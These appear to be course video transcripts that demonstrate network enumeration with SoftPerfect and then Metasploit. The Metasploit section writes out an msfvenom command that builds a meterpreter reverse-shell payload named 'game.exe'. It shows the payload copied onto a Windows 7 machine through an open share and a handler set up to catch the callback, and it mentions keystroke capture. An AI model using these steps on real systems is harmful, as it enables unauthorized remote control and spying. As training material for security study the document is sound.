Summary 02:33-02:54 That's it for this demo. In this demo, we looked at NetBIOS Enumerator. We ran the program and did a scan on our subnet. We looked at the NetBIOS information on a few devices. We discussed NULL sessions, and then we talked about a few of the options that can be configured on the program.

5.3.8 Enumerate with SoftPerfect

Click one of the buttons to take you to that part of the video.

Enumerate a Network with SoftPerfect 00:00-00:22 Enumeration is an important step in information gathering. Enumeration is the process that establishes a connection to a host to discover potential vulnerabilities on the system. There are many programs and methods for doing this. In this demo, we're going to use a program called SoftPerfect to perform a scan and enumeration.

Start a Scan 00:22-01:04 I've already downloaded and installed the SoftPerfect application, so let's go ahead and open it up. I have an evaluation copy of the application. It's telling me that it's only going to display a maximum of ten devices on the network, but that's fine for our demo. I'll click Continue.

The interface is pretty simple. To start a scan, you need to specify an IP range. I can do that manually by entering in the beginning address and the ending address, or I can come up here and select this option, Auto Detect IP Range. That's what I'm going to do. When I do, it detects this system's IP address and subnet mask. Now, when we look up here, we can see that the range is from 0 to 255. I'll click on the Start Scanning button to start our scan.

View the Options 01:04-02:09 While our scan is running, let's talk about a few of the options up here.

With this one, we can select it and load results from a previous scan. Perhaps we did a scan, but didn't have time to analyze it. With this, we can load it into the application to look at later.

Next to that is where can save our results.

As these results are displayed, I may have expanded them all out to view them, so this allows me to collapse them. This option lets me expand them all at once.

Here's our find option. We can search by text.

I can paste in the IP information that I've copied from another location.

If I want to just display the devices that have shared folders, I can click on this option. I can use this one to create other options.

This one discovers the DHCP servers on this subnet. Let's try it. Let's hit Refresh in case my program is still scanning. And up here is my DHCP server, 10.10.10.1.

Here's a Wake-on-LAN manager. So, if my computers are configured properly in the BIOS, I can use this to turn them on.

Here's the auto detect IP range that we used at the beginning of this demo.

Examine the Scan Results 02:09-03:30 Now let's come down here and view some of these results. I'll select this first IP address, right-click, and look at the properties. It gives me some basic information, such as the IP address, the MAC address, and the host name for this device.

Down here, on this one, we have a plus sign. This means that there are some shared folders on it. I'll expand it. You can see I have two shared folders. What I like about this program is that I can just click on the shares, and they open right up.

Let's look at this one, right here. If I right-click, I can see it says Open Device. I can put my cursor over it, and I get more menu items. This one says I can open as web or HTTP. I'll give that a try. When I do, I see that this is actually running the web server, XAMPP, on this machine.

Let's look at some of the other menu options here. If I come down here, I can see I have Remote Desktop. If I think Remote Desktop is running, I can click on it and see if I get a prompt to log in. I get a login screen, so it's running. I'm not interested in logging in, so I'll click Cancel.

We talked about Wake-On LAN. Here, I can click on this device to send it a Wake-On-LAN signal to turn it on.

I have the ability to shut this machine down remotely. I can tell it to go into hibernation.

And finally, I could send it a message, create a batch file, or even delete it from my list of devices.

Summary 03:30-03:48 That's it for this demo. In this demo, we used SoftPerfect to scan and enumerate our subnet. We looked at some of the program's features, such as discovering a DHCP server and finding shared folders. Then we looked at some menu items.

5.3.9 Enumerate with Metasploit

Click one of the buttons to take you to that part of the video.

Using the Metasploit Framework 00:00-01:19 The Metasploit Framework is a tool used to find system vulnerabilities, create exploit code payloads for targeted systems, and leverage those exploits to control or manipulate those systems. It is a framework because it changes its functions based on the modules and parameters the user dictates, and can be updated and modified to meet specific needs. In this demo I'm going to demonstrate the basic capabilities of metasploit, create an executable exploit payload, and enumerate information on a compromised system.

To begin with, let's start with the basics of using the Metasploit Framework, or just Metasploit for short. The Metasploit packages have already been installed and configured as part of my Kali Linux installation. We have a system that we are going to target: a Windows 7 machine on this network. We have found that the Users directories on the Windows 7 machine are shared and allow guest (sometimes called NULL) access. We have already established a way to connect to that machine via Remote Desktop and can execute any code we want. This is where Metasploit comes in. We want to be able to come back to the machine and use it whenever we need information about the machine, its network connections, its users, etc. We are going to create an executable payload and upload it to the Windows 7 computer that will allow us to connect and run commands against it.

Build an Exploit Payload 01:19-02:23 We start by deciding what we are trying to accomplish with metasploit, and that is to install a persistent tool on the remote system that allows commands to be executed there. There is a metasploit tool for generating that executable payload, called msfvenom. From a terminal or shell, we execute 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.172 LPORT=4444 -f exe -o game.exe'. The -p identifies what payload from metasploit's library we want to use, in this case it is the standard remote command tool. The LHOST is the IP address where the targeted system will report back to, and the LPORT the port it will use. These are both on our KALI Linux machine, the one running metasploit. The -f is for the format for the output of the code creation, .exe here. And -o is for the name of the file: game.exe.

Exploit the Target Machine 02:23-05:21 We execute that command, and it builds our game.exe, which we can see here. Now, for this to work on the targeted machine, it needs to be uploaded to it. Since the target system has the Users directory shared, we can just copy it to the Downloads directory, like so. We don't need any of these extra windows, so I'll just close them. Before we execute the code on the Windows machine, we need to configure metasploit to handle the target systems connection when it "phones home". Again in a terminal or shell, we execute 'msfconsole'. After a few moments, it's ready for us. We need to tell it what parts of the framework we want to use, so we'll give a "use" command: 'use exploit/multi/handler'. This is a good general place to start for what we are doing. Now that we have the general portion of our framework to use, we need to define what payload we'll be using: 'set payload windows/meterpreter/reverse_tcp'. That should look familiar to the msfvenom command we used previously. We'll then check which options have been set and which need to be defined, so we run 'show options'. It lists three options we can work with. We only need to change one, the LHOST since we are already using the port we specified when we built the payload: 4444. To change LHOST we type: 'set LHOST 192.168.122.172', which is the IP address of this Kali Linux machine. We could also just type the network interface name, eth0. Let's show options again. Ok, everything looks good. Now we'll type 'run' and press enter. It is waiting for our target machine to connect.

Back on the remote host, we'll execute the payload, then switch back to the Kali Linux box to see what metasploit says. It shows that we have a connection, called "session 1". Notice that the shell prompt changed to "meterpreter". That indicates that there may be new commands for us to use. The 'help' command will give us specifics. There are a lot of options. If I scroll back through the output, I see network options like the 'arp' command to get the arp cache, the system options like 'sysinfo' or 'shutdown', or user interface options like 'keyscan_start' to start capturing keystrokes.

Let's use a simple one: sysinfo. If we type 'sysinfo' and press enter, it gives us the computer name, the OS, the architecture, the Domain, and so forth.

Summary 05:21-05:48 There are many other things you can do with the Metasploit Framework, and we have explored only a few options of its capabilities. Hopefully, this is a good introduction to what is possible and gives you the basics needed to start exploring.

That's it for this demo. We gave you an introduction to the Metasploit Framework and showed how to build a payload, how to interact with the metasploit console, and how to enumerate a targeted Windows system.

Last Updated: